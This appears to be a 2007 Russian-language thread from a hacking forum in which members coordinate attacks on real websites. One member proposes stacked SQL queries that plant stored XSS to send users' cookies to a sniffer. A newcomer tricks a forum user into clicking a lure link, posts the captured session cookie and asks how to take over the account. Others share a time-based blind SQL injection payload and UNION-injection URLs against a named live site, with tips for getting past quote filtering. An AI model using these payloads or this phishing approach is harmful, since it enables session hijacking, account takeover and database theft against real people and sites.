07.11.2007, 20:21
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ну допусти если это Mssql то ты можешь разделять запросы с помошью ; и вставить запрос например Update и изменить данные пользователя в БД например на ядовитый скрипт. т.о когда пользователь зайдет в свой профиль, сработает активная Xss и соответственно получишь куки пользователя на снифер
__________________
Карфаген должен быть разрушен...
|
|
|
08.11.2007, 18:36
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
Заставил юзера пройти по ссылке шоп его куки шли на сниффер.
Прошел,Вижу куки.Что делать с этим?
Имя переменной Значение
ACCEL_ADDR
HTTP_ACCEPT */*
HTTP_ACCEPT_ENCODING gzip, deflate
HTTP_ACCEPT_LANGUAGE ru
HTTP_CACHE_CONTROL
HTTP_CONNECTION close
HTTP_COOKIE PHPSESSID=21ac6a328e4aa73ce55ef32e2b3193f0
HTTP_HOST tx.tehnofil.ru
HTTP_REFERER http://forum.netis.ru/index.php?act=Msg&CODE=03&VID=in&MSID=277026
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRA 4.10 (build 01952); MRSPUTNIK 1, 8, 0, 17 SW; .NET CLR 1.0.3705)
LANG
MM_CHARSET
REMOTE_PORT 57014
SERVER_ADDR 127.0.0.1
SERVER_ADMIN support@uploader.ru
SERVER_NAME tx.tehnofil.ru
SERVER_PORT 80
SERVER_SIGNATURE Apache/1.3.37 Server at tx.tehnofil.ru Port 80
SERVER_SOFTWARE Apache/1.3.37 (Unix) PHP/4.4.7 mod_ssl/2.8.28 OpenSSL/0.9.7e
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING id=test
REQUEST_URI /tsk.php?id=test
SCRIPT_NAME /tsk.php
PHP_SELF /tsk.php
|
|
|
|
08.11.2007, 18:37
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
forum.netis.ru это форум где надо угнать куки
|
|
|
|
08.11.2007, 18:52
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=49,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.7272 сек)
mysql > SELECT * FROM `users` GROUP BY `name` and 1=if(ascii(1)=48,benchmark(99999,md5(char(1))),1 )
->Показывает записи 0 - 0 (1 всего, Запрос занял 0.0006 сек)
|
|
|
|
08.11.2007, 19:13
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
а Как
Вот в куках есть
Member_id:это я нашол
Pass_hash:а суда чито ставить?*
|
|
|
|
08.11.2007, 19:27
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме.
Подскажите с инъектом,я ток начал пробовать..
Код:
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1,1+--+
Я так понял, что фильтруется кавычка, как можно это сделать иначе ?
Последний раз редактировалось ZAMUT; 08.11.2007 в 19:33..
|
|
|
|
08.11.2007, 19:31
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме:
443802
Репутация:
19
|
|
Авторизирован.
Я ему отослал на форуме лс:
Привет.Зайди,скачай пак анекдотов.
Он зашел и все....
ОН АВТОРИЗИРОВАН.
|
|
|
|
08.11.2007, 20:04
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
zamut,
Where+table_name=название в хексе
Where+table_name=название в чаре
|
|
|
|
08.11.2007, 20:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
2delay(0)
спс, сейчас попробую..
|
|
|
|
08.11.2007, 20:11
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
извиняюсь, версию недоглядел..автор, наверно, допустил опечатку
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMAT I ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+ 1 ,1+--+
Последний раз редактировалось VentRu; 08.11.2007 в 21:12..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
